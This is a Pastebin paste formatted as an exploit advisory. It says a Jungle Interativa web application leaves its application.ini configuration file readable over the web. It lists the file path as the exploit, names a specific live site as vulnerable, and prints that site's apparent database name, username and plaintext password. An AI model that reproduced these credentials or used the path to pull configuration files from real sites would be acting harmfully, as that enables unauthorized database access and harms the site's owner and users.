KingSkrupellos

Jungle Interativa Database Configuration Disclosure

Mar 28th, 2019
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.01 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : Jungle Interativa Database Configuration Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 29/03/2019
  7. # Vendor Homepage : novo.jungleclientes.com.br
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type :
  12. CWE-16 [ Configuration ]
  13. CWE-200 [ Information Exposure ]
  14. CWE-538 [ File and Directory Information Exposure ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ############################################################################################
  20.  
  21. # Impact :
  22. ***********
  23. * Site by Jungle Interativa configuration file may potentially disclose sensitive information to remote attackers.
  24.  
  25. The configuration file stored in /application/configs/application.ini
  26.  
  27. HTTP requests consisting of a single character will cause the software to disclose sensitive
  28.  
  29. configuration information, including the password/database to the administrative web interface.
  30.  
  31. This file is installed, by default, with world readable and possibly world writeable permissions enabled.
  32.  
  33. This may have some potentially serious consequences as the configuration file
  34.  
  35. also stores password information in plain text.
  36.  
  37. This issue occurs because access controls on configuration files are not properly set.
  38.  
  39. An attacker can exploit this issue to retrieve potentially sensitive information.
  40.  
  41. Attackers can access config file via URL request. This may aid in further attacks.
  42.  
  43. * The product stores sensitive information in files or directories that are accessible to actors
  44.  
  45. outside of the intended control sphere.
  46.  
  47. * An information exposure is the intentional or unintentional disclosure of information to an actor
  48.  
  49. that is not explicitly authorized to have access to that information.
  50.  
  51. ############################################################################################
  52.  
  53. # Database Configuration File Disclosure Exploit :
  54. *******************************************
  55. /application/configs/application.ini
  56.  
  57. ###########################################################################################
  58.  
  59. # Example Vulnerable Sites :
  60. *************************
  61. [+] vibecf.com/application/configs/application.ini
  62.  
  63. resources.multidb.name1.adapter = pdo_mysql
  64. resources.multidb.name1.dbname = vibecf_site
  65. resources.multidb.name1.username = vibecf_site
  66. resources.multidb.name1.password = "+!o[4lWXf{Cb"
  67. resources.multidb.name1.host = "localhost"
  68. resources.multidb.name1.default = true
  69. resources.multidb.name1.charset = "utf8"
  70.  
  71. ############################################################################################
  72.  
  73. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  74.  
  75. ############################################################################################
Add Comment
Please, Sign In to add comment